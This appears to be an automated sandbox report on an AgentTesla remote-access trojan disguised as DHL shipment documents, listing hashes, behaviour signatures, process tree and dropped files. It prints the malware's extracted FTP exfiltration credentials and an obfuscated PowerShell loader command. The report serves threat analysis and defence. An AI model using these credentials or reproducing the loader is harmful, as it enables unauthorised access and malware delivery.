Analysis

  • max time kernel
    290s
  • max time network
    279s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-01-2025 01:26

General

  • Target

    Dhl shipment documents 0002949400405000599500000.exe

  • Size

    896KB

  • MD5

    22a542bc1325916eb1816ebca91fb95b

  • SHA1

    88320ab57b6542208dc82b87ba7372c2b43f6aac

  • SHA256

    36188bc6b8b6ff6066410e82279f79a7fe8ce638fa0e3b684ff008276689f867

  • SHA512

    f7ec8166ef7202cf9f0917c2c5f7215a7ef942250ccba67a4a5ecf16ffbe5f6370ba871baabb4cfb2bcaa403bb83fe5fc41a813e1f5400c8551796068407eec3

  • SSDEEP

    24576:cQ2HggprreJ47AsXQLY21226O31A3Rh+1d:aHgfm3XQL+I3q3Rh+1d

Malware Config

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    ftp.concaribe.com
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    ro}UWgz#!38E

Extracted

Family

agenttesla

Credentials

  • Protocol:
    ftp
  • Host:
    ftp://ftp.concaribe.com
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    ro}UWgz#!38E

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Agenttesla family
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Dhl shipment documents 0002949400405000599500000.exe
    "C:\Users\Admin\AppData\Local\Temp\Dhl shipment documents 0002949400405000599500000.exe"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:5036
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle minimized "$Quarterdecks=Get-Content -Raw 'C:\Users\Admin\AppData\Local\Temp\Falsetstemmen\nonseparating\adjurors\Hvirvelbevgelsernes.Ikk';$Endothecal=$Quarterdecks.SubString(2893,3);.$Endothecal($Quarterdecks)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3160
      • C:\Windows\SysWOW64\msiexec.exe
        "C:\Windows\SysWOW64\msiexec.exe"
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:772

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Falsetstemmen\nonseparating\adjurors\Hvirvelbevgelsernes.Ikk

    Filesize

    73KB

    MD5

    af165b58e2cceb026d0baf83b9595cd0

    SHA1

    6ecce4d663557932f43c6073adf571765513ddf7

    SHA256

    363ac4b321b7c972b3d56c7f240e0c568a0403e59584c994572921c2800d56c4

    SHA512

    8edd36273c0f1ee785607ae6e5881d86778b1f5eeaaa49167186055f5eb93a603aa441a3ace01048db294e793c702f182a4865163311972afb46505e9c4aebb0

  • C:\Users\Admin\AppData\Local\Temp\Falsetstemmen\nonseparating\adjurors\Principalens.Gle

    Filesize

    325KB

    MD5

    51d0d3c20e7ead789be0befd1ac1a7f0

    SHA1

    44ef62be60f8ea6b36b06954f7ad16fc60fc7883

    SHA256

    239c12c044b0a23d94ccb374117b8518f07e99645e3644f06cd34bc0cd910141

    SHA512

    a7e881e82b8adf99feaf600fc695a201365434c3858a4e73c44f3193e37920a262ce665ffa21396e18e99f83dcdf6fc4c818e9d694d57e3f6155c453851648ce

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rij4wm5t.nix.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\dowdies.lnk

    Filesize

    906B

    MD5

    5a355f0ebbf61d8073fa672ab5541cb4

    SHA1

    a91e53c8210120df4213cb1a8f589c75a777b387

    SHA256

    712e50c65d462c100bd3688cc0925e732431fbcda3e49e6a1aa643da0cb26d98

    SHA512

    7410ff4acf331ff005bad1f60e577eae6fd471e073feeb7500abf7daa35f7078fbc139738d5464e38b8ab133ff588d18d777c64627d2ca7e9a39b09f60e50da9

  • memory/772-223-0x00000000265A0000-0x00000000265AA000-memory.dmp

    Filesize

    40KB

  • memory/772-222-0x0000000026640000-0x00000000266D2000-memory.dmp

    Filesize

    584KB

  • memory/772-221-0x0000000026500000-0x000000002659C000-memory.dmp

    Filesize

    624KB

  • memory/772-220-0x0000000026410000-0x0000000026460000-memory.dmp

    Filesize

    320KB

  • memory/772-219-0x0000000000B40000-0x0000000000B82000-memory.dmp

    Filesize

    264KB

  • memory/772-218-0x0000000000B40000-0x0000000001D94000-memory.dmp

    Filesize

    18.3MB

  • memory/772-217-0x0000000000B40000-0x0000000001D94000-memory.dmp

    Filesize

    18.3MB

  • memory/3160-196-0x0000000073950000-0x0000000074100000-memory.dmp

    Filesize

    7.7MB

  • memory/3160-202-0x0000000007A60000-0x0000000007A8A000-memory.dmp

    Filesize

    168KB

  • memory/3160-174-0x0000000006DD0000-0x0000000006E66000-memory.dmp

    Filesize

    600KB

  • memory/3160-175-0x0000000006240000-0x000000000625A000-memory.dmp

    Filesize

    104KB

  • memory/3160-176-0x0000000006290000-0x00000000062B2000-memory.dmp

    Filesize

    136KB

  • memory/3160-177-0x0000000007420000-0x00000000079C4000-memory.dmp

    Filesize

    5.6MB

  • memory/3160-172-0x0000000005D20000-0x0000000005D3E000-memory.dmp

    Filesize

    120KB

  • memory/3160-179-0x0000000008050000-0x00000000086CA000-memory.dmp

    Filesize

    6.5MB

  • memory/3160-181-0x000000006FDD0000-0x000000006FE1C000-memory.dmp

    Filesize

    304KB

  • memory/3160-180-0x0000000007130000-0x0000000007162000-memory.dmp

    Filesize

    200KB

  • memory/3160-191-0x0000000073950000-0x0000000074100000-memory.dmp

    Filesize

    7.7MB

  • memory/3160-192-0x0000000007170000-0x000000000718E000-memory.dmp

    Filesize

    120KB

  • memory/3160-194-0x00000000071A0000-0x0000000007243000-memory.dmp

    Filesize

    652KB

  • memory/3160-193-0x0000000073950000-0x0000000074100000-memory.dmp

    Filesize

    7.7MB

  • memory/3160-195-0x00000000072A0000-0x00000000072AA000-memory.dmp

    Filesize

    40KB

  • memory/3160-171-0x0000000005930000-0x0000000005C84000-memory.dmp

    Filesize

    3.3MB

  • memory/3160-197-0x00000000079D0000-0x00000000079E1000-memory.dmp

    Filesize

    68KB

  • memory/3160-198-0x0000000007A00000-0x0000000007A0E000-memory.dmp

    Filesize

    56KB

  • memory/3160-199-0x0000000007A10000-0x0000000007A24000-memory.dmp

    Filesize

    80KB

  • memory/3160-200-0x0000000007A50000-0x0000000007A6A000-memory.dmp

    Filesize

    104KB

  • memory/3160-201-0x0000000007A40000-0x0000000007A48000-memory.dmp

    Filesize

    32KB

  • memory/3160-173-0x0000000005F20000-0x0000000005F6C000-memory.dmp

    Filesize

    304KB

  • memory/3160-203-0x0000000007A90000-0x0000000007AB4000-memory.dmp

    Filesize

    144KB

  • memory/3160-204-0x000000007395E000-0x000000007395F000-memory.dmp

    Filesize

    4KB

  • memory/3160-205-0x0000000073950000-0x0000000074100000-memory.dmp

    Filesize

    7.7MB

  • memory/3160-206-0x0000000073950000-0x0000000074100000-memory.dmp

    Filesize

    7.7MB

  • memory/3160-207-0x0000000073950000-0x0000000074100000-memory.dmp

    Filesize

    7.7MB

  • memory/3160-208-0x0000000073950000-0x0000000074100000-memory.dmp

    Filesize

    7.7MB

  • memory/3160-161-0x00000000056A0000-0x0000000005706000-memory.dmp

    Filesize

    408KB

  • memory/3160-210-0x0000000073950000-0x0000000074100000-memory.dmp

    Filesize

    7.7MB

  • memory/3160-211-0x00000000086D0000-0x000000000E486000-memory.dmp

    Filesize

    93.7MB

  • memory/3160-212-0x0000000073950000-0x0000000074100000-memory.dmp

    Filesize

    7.7MB

  • memory/3160-213-0x0000000073950000-0x0000000074100000-memory.dmp

    Filesize

    7.7MB

  • memory/3160-215-0x0000000073950000-0x0000000074100000-memory.dmp

    Filesize

    7.7MB

  • memory/3160-216-0x0000000073950000-0x0000000074100000-memory.dmp

    Filesize

    7.7MB

  • memory/3160-160-0x0000000004F00000-0x0000000004F66000-memory.dmp

    Filesize

    408KB

  • memory/3160-159-0x0000000004D60000-0x0000000004D82000-memory.dmp

    Filesize

    136KB

  • memory/3160-157-0x0000000073950000-0x0000000074100000-memory.dmp

    Filesize

    7.7MB

  • memory/3160-158-0x0000000004F70000-0x0000000005598000-memory.dmp

    Filesize

    6.2MB

  • memory/3160-156-0x0000000073950000-0x0000000074100000-memory.dmp

    Filesize

    7.7MB

  • memory/3160-155-0x0000000002400000-0x0000000002436000-memory.dmp

    Filesize

    216KB

  • memory/3160-154-0x000000007395E000-0x000000007395F000-memory.dmp

    Filesize

    4KB